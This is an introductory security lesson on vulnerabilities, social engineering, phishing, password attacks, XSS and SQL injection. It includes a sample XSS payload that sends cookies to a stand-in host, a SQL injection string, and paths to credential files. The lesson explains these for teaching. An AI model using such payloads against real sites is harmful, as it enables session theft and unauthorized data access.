7.01 Explain common social engineering attacks, threats, and vulnerabilities

Introduction 

Imagine trying to protect your home, not just from outside burglars, but from people who might sneak in pretending to be someone you trust, like a delivery person or a maintenance worker.

Just as securing your home requires careful attention to who you let in and how you safeguard valuable possessions, securing a network requires understanding the many ways it can be attacked—especially by those using trickery and manipulation to gain access.

In this lesson, you’ll learn about social engineering attacks, threats, and vulnerabilities, so you can identify weaknesses in your system and help others secure their networks. Understanding these tactics is critical in solving security problems, preventing breaches, and ensuring that sensitive information stays protected.

Information Security Overview 

Information security involves controlling access to data in any format, whether it’s stored on computers or in paper records. Information security relies on three key properties, often referred to as the CIA triad

  • Confidentiality: Only certain people should know specific information. 

  • Integrity: Data must be stored and transferred exactly as intended, with changes only made when authorized. 

  • Availability: Information should be accessible to those who are allowed to view or modify it. 

Cybersecurity vs. Information Security 

While information security applies to protecting data in any form (electronic or printed), cybersecurity focuses specifically on protecting computer systems and data from attacks. 

Security Policies and Hardening Systems 

Security is ensured by creating security policies and controls. Improving the security of a system is often called hardening. These security policies should cover all aspects of an organization’s technology use, from buying equipment to changing and managing systems, as well as defining acceptable use. 

Security Assessments 

As part of maintaining security, teams perform assessments to check how secure a network is. These assessments focus on three key areas: 

  • Vulnerability: A weakness that could lead to a security breach, either by accident or on purpose. 

  • Threat: The potential for someone or something to exploit a vulnerability. A threat can be intentional or unintentional. The person or thing responsible for the threat is known as a threat actor or threat agent. The method used to carry out the attack is called an attack vector or threat vector.

  •  Risk: The likelihood and impact of a threat actor exploiting a vulnerability. 

Understanding Threats and Vulnerabilities 

To improve security, it’s important to recognize the types of threats an organization faces and how these threats can take advantage of vulnerabilities to launch attacks. 

Understanding Vulnerabilities 

A vulnerability is a weakness or flaw in a system that could be exploited by a threat actor. Vulnerabilities can occur for many reasons, such as: 

  • Incorrectly configured or installed hardware/software. 

  • Delays in applying software/firmware patches. 

  • Using untested patches. 

  • Misuse of software or communication protocols. 

  • Poorly designed network architecture. 

  • Weak physical security. 

  • Insecure password practices. 

  • Design flaws in software or operating systems (e.g., unchecked user input). 

Non-compliant Systems 

A configuration baseline is a set of recommendations for deploying a computer with strong security measures. The goal is to reduce the system’s attack surface, meaning the points a threat actor could use to attack or disrupt the system. 

A non-compliant system is one that no longer follows its baseline security configuration. Vulnerability scanners are tools used to detect such non-compliant systems. 

Unprotected Systems 

A baseline also recommends technical security controls to keep a system safe. Examples include: 

  • Antivirus scanners 

  • Firewalls 

  • Intrusion detection systems 

An unprotected system is one where at least one of these controls is missing or improperly configured, increasing the attack surface and exposing more vulnerabilities. 

Software and Zero-day Vulnerabilities 

A software vulnerability is a design or coding flaw that can be exploited to bypass security or cause an application to crash. The most dangerous vulnerabilities allow attackers to execute arbitrary code (code of their choice), potentially leading to malware installation. 

Exploits are malicious code that take advantage of vulnerabilities to compromise a system. 

Zero-day vulnerabilities are flaws that are exploited before the developer is aware of them or before a patch can be released. These vulnerabilities are dangerous because it can take time to develop a patch, leaving systems exposed for long periods. 

Unpatched and End of Life Operating Systems 

While zero-day exploits are rare, a bigger threat comes from systems that are unpatched or end of life (EOL)

  • Unpatched systems: Systems not updated with the latest security patches. 

  • Legacy or EOL systems: Systems where the software vendor no longer provides support or fixes. 

These vulnerabilities don’t just affect PCs. Any network-connected device, like embedded systems or Internet of Things (IoT) devices, can also be at risk. 

Embedded system: Smart Watch

Internet of Things: Smart Home System

Bring Your Own Device (BYOD) Vulnerabilities 

Bring Your Own Device (BYOD) allows employees to use personal devices for work. This increases security challenges because it’s hard to define secure configuration baselines for each device type and mobile OS version. BYOD increases the network attack surface, making it harder to ensure security compliance. 

Social Engineering Overview 

Social engineering refers to techniques that trick or intimidate people into revealing confidential information or granting unauthorized access to an organization’s systems. Many attacks rely on social engineering to gather information about a network and its security controls. 

Preventing these attacks requires knowing the most common social engineering methods

Impersonation 

Impersonation involves the attacker pretending to be someone they’re not to interact with an employee. A common example is when an attacker pretends to be from IT support, calling an employee and convincing them to reveal their password by claiming they need to adjust something remotely. 

For this type of attack to work, the attacker often tries to gain trust or use intimidation to force the employee to comply. 

Dumpster Diving 

Attackers use dumpster diving to gather information by searching through an organization’s trash. They look for documents or discarded files that could help them in a future attack. Items like employee lists, job titles, phone numbers, or even old invoices can provide valuable information for attackers. 

Shoulder Surfing 

Shoulder surfing is when an attacker learns a password or PIN by watching someone type it. This doesn’t always mean they’re standing next to the person. Attackers could use tools like binoculars or even CCTV to observe from a distance. 

Tailgating and Piggybacking 

  • Tailgating: An attacker enters a secure area by following closely behind someone with proper access. 

  • Piggybacking: An attacker gains access to a secure area with an employee’s permission, often by pretending to be someone like a cleaning crew member and asking for help to open the door. 

Phishing and Evil Twins 

Phishing is a social engineering technique used to trick victims into believing that fake electronic communications are real. The goal of phishing is often to convince the victim to take some harmful action, such as installing malware disguised as legitimate software or allowing a fake support technician to establish a remote access connection

How Phishing Works 

Some phishing attacks use spoof websites that look like trusted sites, such as banks or e-commerce platforms. The attacker will email users of the real website, urging them to update their account or respond to a fake alert. The email contains a link to the spoofed site, where the user is tricked into entering their login credentials, which the attacker then steals. 

Types of Phishing Attacks 

Spear Phishing 

Spear phishing is a targeted phishing attack. The attacker has specific information about the victim, such as their name, job title, or other details. This personal information makes the attack more convincing and harder to spot. For example, the attacker might send a fake document that looks like one the victim is working on. 

Whaling 

Whaling is a phishing attack aimed at upper-level management, such as CEOs or other executives ("big catches"). These high-level employees may be more vulnerable because they often neglect basic security practices. 

Vishing 

Vishing (voice phishing) is conducted over a voice channel (phone or VoIP). In a vishing attack, an attacker might pretend to be a representative from a bank, asking the target to verify a recent transaction and provide sensitive security details. People are often more likely to respond to a phone request than an email. 

Evil Twin Attacks 

An evil twin attack is similar to phishing but uses a rogue wireless access point (AP) instead of an email. The attacker creates a fake Wi-Fi network with a name (SSID) similar to a legitimate one. In some cases, they may use denial of service (DoS) attacks to disrupt the real AP, forcing users to connect to the fake one. 

Once connected, users are redirected to a spoofed login page where they enter their network credentials, which the attacker then steals. 

Types of Cybersecurity Threats 

Historically, cybersecurity focused on identifying static threats like computer viruses. These threats leave a clear code signature that can be easily detected by scanning software. However, attackers have found ways to avoid these signature-based scans, making modern threats more complex. 

To defend against today’s threats, it’s important to analyze behaviors rather than just code. This involves understanding the location, intent, and capability of threat actors. 

External vs. Internal Threats 

External Threats 

An external threat actor has no authorized access to the target system. They must find a way to break in using methods like malware or social engineering. The actor is considered external, regardless of whether the attack happens remotely or in person. 

Internal Threats 

An insider threat actor already has some level of authorized access, like an employee, contractor, or business partner. Insider threats can be: 

  • Malicious: A disgruntled employee trying to steal or damage data. 

  • Non-malicious: An employee unintentionally causing a security risk, like setting up a personal server on a company computer. 

Footprinting Threats 

Footprinting is when an attacker gathers information about a network or security system. This is done by performing reconnaissance, researching the target, scanning network ports, and using social engineering to find vulnerabilities. 

Spoofing Threats 

Spoofing involves pretending to be a trusted user or system. This can include: 

  • Cloning a valid MAC or IP address

  • Using a fake digital certificate

  • Sending phishing emails that look legitimate. 

  • Social engineering to impersonate someone. 

Spoofing can also involve stealing logical tokens (like web cookies) used during authentication. If the system is poorly designed, an attacker can use the stolen token to impersonate the user in what’s known as a replay attack

On-path Attacks 

An on-path attack (formerly called man-in-the-middle) is a type of spoofing where the attacker secretly intercepts and possibly modifies the communication between two parties. These attacks are often aimed at stealing password hashes. An evil twin attack is an example of an on-path attack. 

Distributed Denial of Service (DDoS) Attacks and Botnets 

A distributed denial of service (DDoS) attack is a type of DoS attack that uses a network of compromised devices, called a botnet, to flood a target with bogus requests. 

To create a botnet, the attacker first compromises one or two machines (known as command and control (C&C) hosts).

Denial of Service (DoS) Attacks 

A denial of service (DoS) attack causes a system or service to fail, making it unavailable to legitimate users. This is usually done by overwhelming the system with fake requests or by exploiting vulnerabilities to make the system crash.

DoS attacks are often launched just to cause problems but can also be used to distract security teams while a more serious attack, like data theft, is taking place. 

These C&C hosts are then used to control hundreds or thousands of other compromised devices (bots) and launch a coordinated attack. 

Password Attacks Overview 

In many network breaches, attackers don’t need to use complex methods like on-path or malware attacks. Instead, they often gain access by obtaining credentials (usernames and passwords). Once inside, attackers may try to escalate privileges by capturing credentials for administrative accounts to access more parts of the network. 

Capturing Plaintext Passwords 

A plaintext password can be captured if an attacker gets a password file or sniffs unencrypted network traffic. If the system doesn’t use encryption, the attacker can simply read the password directly from the captured data. 

Storing Passwords Securely 

In most systems, passwords are not stored as plaintext. Instead, they are processed through a cryptographic hash algorithm. A cryptographic hash takes the user’s password and turns it into a fixed-length string using a one-way function. This means the password can’t (in theory) be recovered from the hash, even by a system administrator. 

Password Encoding vs. Hashing 

Sometimes passwords are sent in an encoded form, like Base64, which is just a way of converting binary data into readable text. However, encoding is not the same as cryptographic hashing, and Base64 passwords can easily be decoded

Capturing Password Hashes 

Attackers may try to get password hashes from a system by: 

  • Accessing password databases or files like: 

    • %SystemRoot%\System32\config\SAM (Windows password file). 

    • %SystemRoot%\NTDS\NTDS.DIT (Active Directory credential store). 

    • /etc/shadow (Linux password file). 

  • Using an on-path attack to capture the password hash during user authentication. 

Cracking Passwords 

Once attackers have the password hash, they can use password cracking software to guess the original password. Two common techniques are used: 

1. Dictionary Attack 

In a dictionary attack, the software compares the hash to those produced by common words or phrases, like: 

  • Ordinary words found in a dictionary. 

  • Personal details, such as: 

    • User or company names. 

    • Pet names. 

    • Significant dates (like birthdays). 

2. Brute Force Attack 

A brute force attack tries every possible combination of characters until it finds a match. The time it takes depends on the length and complexity of the password. Short and simple passwords (e.g., under 8 characters and using only lowercase letters) can be cracked quickly, while longer and more complex passwords take much longer. 

Cross-site Scripting (XSS) Attacks Overview 

Many network services are now delivered through web applications. These applications use the HTTP/HTTPS protocols, which rely on servers responding to client requests. Web apps can be dynamic, allowing user interactions and database connections, and they can use two types of code: 

  • Server-side code: Runs on the web server to process requests and send responses. 

  • Client-side code: Runs in the user's web browser to modify the webpage or requests sent to the server.

Input Validation Vulnerabilities 

Most web applications require user input. One of the most common vulnerabilities is the failure to properly validate this input. For example, if a user enters a script in the username field of a sign-in form, it could be executed by the server or client if the input is not validated correctly. This type of vulnerability opens the door for cross-site scripting (XSS) attacks

How Cross-site Scripting (XSS) Works 

An XSS attack tricks the browser into running a malicious script from a trusted website. Since the script appears to come from a site the user trusts, the browser allows it to execute. 

Stored/Persistent XSS Attacks 

A stored (persistent) XSS attack injects malicious code into the website's back-end database or content management system. The code is stored on the server and executed when other users view the affected content. 

When users view the post, their browsers will execute the malicious script, causing harm such as stealing data or compromising their session. 

Steps in a Nonpersistent XSS Attack: 

  1. Identify vulnerability: The attacker finds a site with an input validation vulnerability. 

  2. Craft the attack: The attacker creates a URL that injects malicious code. This could be embedded in a link from another website or a phishing email. 

  3. Execute the code: When the user clicks the link, the trusted site returns a page with the injected malicious code. 

  4. Run the script: The browser executes the malicious code because it trusts the site. The code can: 

  • Deface the site (add or modify HTML content). 

  • Steal data from the user's cookies. 

  • Intercept form information

  • Install malware

A nonpersistent XSS attack does not change any data on the web server; it only affects the user’s session. 

For example, an attacker might embed a malicious script in a forum post or comment like this: 

Click here for a great deal! <img src="https://trusted.com/deal.jpg" onerror="document.location='https://badsite.foo/stealcookie.php?cookie=' + document.cookie;"> 

SQL Injection Attacks Overview 

Web applications often use Structured Query Language (SQL) to manage data stored in databases. SQL commands perform operations like: 

  • SELECT: Retrieving data. 

  • INSERT: Adding new data. 

  • DELETE: Removing data. 

  • UPDATE: Modifying existing data. 

In a SQL injection attack, the attacker manipulates these commands by injecting malicious code into an input field, tricking the application into running the attacker's own SQL queries. This can allow the attacker to extract, insert, or even execute code on the server with the same privileges as the database. 

Example of a SQL Injection 

Imagine a web form that asks for a username. When the user enters “Bob,” the application might run this SQL query:

sql

Copy code

SELECT * FROM tbl_user WHERE username = 'Bob'

This query checks the database for users named Bob. 

However, if an attacker enters ' or 1=1--, and the input is not properly sanitized, the SQL query would change to:

sql

Copy code

SELECT * FROM tbl_user WHERE username = '' or 1=1--#

  • 1=1 is always true, so this query returns all users from the database. 

  • The --# turns the rest of the query into a comment, ensuring the query is executed as the attacker intended. 

Why SQL Injection is Dangerous 

If successful, a SQL injection attack could allow attackers to: 

  • Access sensitive data (e.g., usernames, passwords). 

  • Insert or delete data in the database. 

  • Execute arbitrary code on the server with the same privileges as the database application. 

To prevent SQL injection attacks, it's crucial to sanitize user input and use parameterized queries to avoid unauthorized code execution. 

Summary

You're doing a great job learning about common social engineering attacks, threats, and vulnerabilities! Understanding these concepts, like information security, encryption, and how attacks like phishing or SQL injection work, is a huge step in keeping networks, systems, and coworkers safe. Every bit of knowledge you gain helps you protect the people and technology around you from security breaches. Stay confident—you're building the skills needed to create a more secure environment for everyone! Keep up the great work!